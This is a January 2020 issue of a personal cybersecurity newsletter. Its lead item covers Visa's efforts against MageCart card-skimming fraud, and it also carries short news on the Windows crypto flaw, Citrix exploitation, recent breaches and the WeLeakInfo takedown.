Home / Robin's Newsletter

Robin’s Newsletter #83

 Vol. 3  Iss. 3  19/01/2020, last updated 06/04/2020   Robin Oldham  ~6 Minutes

This week

Changing the economics of cybercrime

A not-hugely-report-but-interesting read this week on how the team at Visa are working to tackle MageCart payment card fraud.

MageCart attacks work by add virtual ‘card skimmers’ to the checkout pages of hacked eCommerce websites. When a user fills out their card details a copy is encoded and sent to the criminal gang. Because they’re intercepted as the user enters them into the web browser, they can see card numbers, expiry dates and the all-important three/four card verification digits. This can then be reused by the criminals themselves or, more often, bundled up and sold on to other crooks.

Visa plans to ‘devalue and disrupt’ the economics of these attacks.

Devaluation will be achieved by moving away from static card numbers that are valid for many years towards shorter-term tokens. These tokens are often referred to as Device, or Virtual, account numbers. It’s the same sort of technology that powers contactless services like Apple Pay and G Pay.

‘Wallets’ like this only require you to enter the card details once meaning the opportunity for an attacker to steal the card information is hugely reduced. They’re also great for users by simplifying how you pay for things online, whilst also increasing consumer protection.

Disruption is achieved by investing in engineering and operations teams.

Engineering teams have developed tools to help vendors scan their sites for malware like MageCart has helped to prevent attacks ‘potentially saving merchants $141 million.’ These tools not only help individual website owners protection and within the Visa network too.

Operational teams conduct data analysis of transaction patterns. This can be used not just for an individual user (are you really on holiday in Brazil?) but at macro levels: ‘the common vendors amongst these 100 different fraud cases is X.’

This visibility is how challenger-bank Monzo was first to alert on the TicketMaster MageCart incident because of the visibility they had intro transaction patterns (vol. 1, iss. 2.) Centralised payment providers like MasterCard, Visa or inter-bank providers like SWIFT have this visibility at scale.

Financial services are well placed to help systemically tackle cybercrime. The whole purpose is for economic gain to the criminals. Increased connectivity has made it easier to carry out fraud across jurisdictions, it also increases the reliance on the same financial systems to move the proceeds of their crimes. There are opportunities to detect upfront or prevent funds from being consolidated and liquidated.

The other sector with unique placement is telecoms who provide the wired and wireless conduits over which we access services and conduct transactions online. BT, one of the largest Internet Service Providers in the UK, already block more than 100 million connections every month[1] to websites peddling malware. There are, of course, lines to be considered around privacy, net neutrality and free speech. Though we shouldn’t let perfection be the enemy of success.

There is good news to be found. Research led by Ross Anderson[1] shows that over the latter two-thirds of the previous decade the value of payment fraud more than doubled. The total value of payments did to meaning that, as a proportion, payment fraud is actually down.

Steps like this are making a contribution. The good folks are winning.

Systemic changes like this are what will help tackle cybercrime - it’s not something that should be left to every organisation (or individual) - we need to keep changing the economics instead of blaming the user. zdnet.com, 1, btplc.com, 2, econinfosec.org (PDF)

Interesting stats

$7M the cost of ransomware outbreak to The City of New Orleans, with $3M payout from the city’s insurance company, and 3,400 computers needing to be cleaned [https://www.fox8live.com/2020/01/15/city-new-orleans-says-it-will-take-months-recover-recent-cyber-attack/]

334 vulnerabilities fixed in Oracles largest ever ‘Critical Patch Update’ [https://www.zdnet.com/article/oracle-just-released-a-whopping-334-security-fixes-in-critical-patch-update/]

$380.5M settlement for Equifax class-action lawsuit $77.5M payday for the attorneys [https://www.cyberscoop.com/equifax-data-breach-settlement/]

Other newsy bits

Quite vulnerability / patch-heavy this week…

Microsoft patch critical vulnerability in cryptography library

This one, however, got bucket-loads of coverage: An issue in the way Windows 10 and Server 2016/2019 handle cryptography used to check website certificates (the padlock in the address bar) was patched by Microsoft this week. The vulnerability was shared with them by the US National Security Agency, who also advised organisations to patch immediately. Given that phishing is the most common cyber-attack techniques - for cybercriminals and nation-states alike - being able to spoof a valid login page for any web service would have been extremely valuable to an organisation like the NSA. Presumably, then, someone the NSA didn’t want using it has found the vulnerability and started using it. A funny demonstration came from researcher Saleem Rashid who tweeted photos of the NSA and Github websites playing Rick Astley’s Never Gonna Give You Up. (The sites themselves weren’t compromised, rather they were spoofed and validated as a result of the vulnerability.) theguardian.com, defense.gov (PDF), wired.com (rickroll)

Internet Explorer, Firefox patched against remote code bugs

Chinese researchers Qihoo 360 have been credited with discovering and reporting bugs that are ‘being actively exploited in the wild’ in both Mozilla’s Firefox and Microsoft’s Internet Explorer. The bugs exploit how memory is handled by the browsers to remotely execute malicious code on a victims computer. techcrunch.com

Rival groups exploiting Citrix vulnerability

Last week I covered the bug with Citrix Application Delivery Controller (ADC) and Citrix Gateway, formerly both of the NetScaler family. Citrix has promised a patch by the end of the month and attackers have already begun actively compromising Citrix servers on the web. And at least one group is booting the others out before patching the issue to keep access solely for themselves. Last week FireEye has dubbed it ‘NOTROBIN’ (no relation) and have some other technical details on the attacks. theregister.co.uk, fireeye.com

In brief

Good reads

  • Tor Hidden Services Are a Failed Technology, Harming Children, Dissidents and Journalists lawfareblog.com

Attacks, incidents & breaches

  • Aussie P&N bank suffers data breach scmagazine.com
  • Travelex services begin again after ransomware cyber-attack theguardian.com
  • Cut Undersea Cable Plunges Yemen Into Days-Long Internet Outage wired.com

Threat intelligence

Privacy

  • NIST Releases Version 1.0 of Privacy Framework nist.gov
  • All the Ways Facebook Tracks You—and How to Limit It wired.com
  • Verizon launches privacy-focused search engine called OneSearch cnet.com
  • EU considers banning facial recognition technology in public spaces zdnet.com

And finally

WeLeakInfo seized in joint operation

A website called WeLeakInfo was seized by the FBI in a multi-national law enforcement operation this week, led by the UK National Crime Agency. The site stopped up and indexed personal data revealed in data breaches. Over 12 billion credentials were available via the site. Access to the treasure-trove of personal info was then sold to cybercriminals and fraudsters on a subscription basis. Two individuals, from Northern Ireland and Finland, linked to the site have been arrested and are believed to have made £200,000 from running the site. theregister.co.uk